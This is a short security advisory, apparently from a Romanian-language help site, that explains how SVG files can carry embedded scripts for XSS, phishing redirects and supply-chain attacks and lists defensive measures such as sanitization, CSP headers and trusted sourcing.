Situatie

Unlike formats like PNG or JPEG, an SVG file isn’t just an image — it’s actually a text-based XML file that can include JavaScript, CSS, and external resource calls. This means that, if misused, SVGs can contain malicious scripts capable of:

• Injecting malware into a website or application

• Stealing cookies or session data from a user’s browser

• Redirecting users to phishing pages or malicious sites

• Running cross-site scripting (XSS) attacks to exploit web apps.

For example, a seemingly harmless logo.svg could contain embedded <script> tags that execute as soon as the file is loaded into the browser.

Real-World Attack Scenarios

1. Website Upload Exploits
   Attackers upload an SVG with malicious JavaScript to a content management system (CMS) that doesn’t sanitize uploads. Once displayed, the script executes in visitors’ browsers.

2. Phishing Campaigns
   SVGs can be sent via email or chat platforms, disguised as images. If the file is opened in a browser, the hidden code can redirect the victim to a credential-harvesting page.

3. Supply Chain Injections
   Third-party icon libraries or SVG packs downloaded from unverified sources can be preloaded with malicious scripts, compromising any site that uses them.

How to Protect Against SVG-Based Attacks

• Sanitize SVG files before use, stripping out all <script> and potentially harmful attributes

• Disable inline JavaScript in SVGs entirely

• Convert SVGs to safer formats like PNG before uploading to public-facing platforms

• Use Content Security Policy (CSP) headers to limit what resources SVGs can access

• Only source SVGs from trusted providers and scan them with antivirus or security tools.

Solutie

Tip solutie

Permanent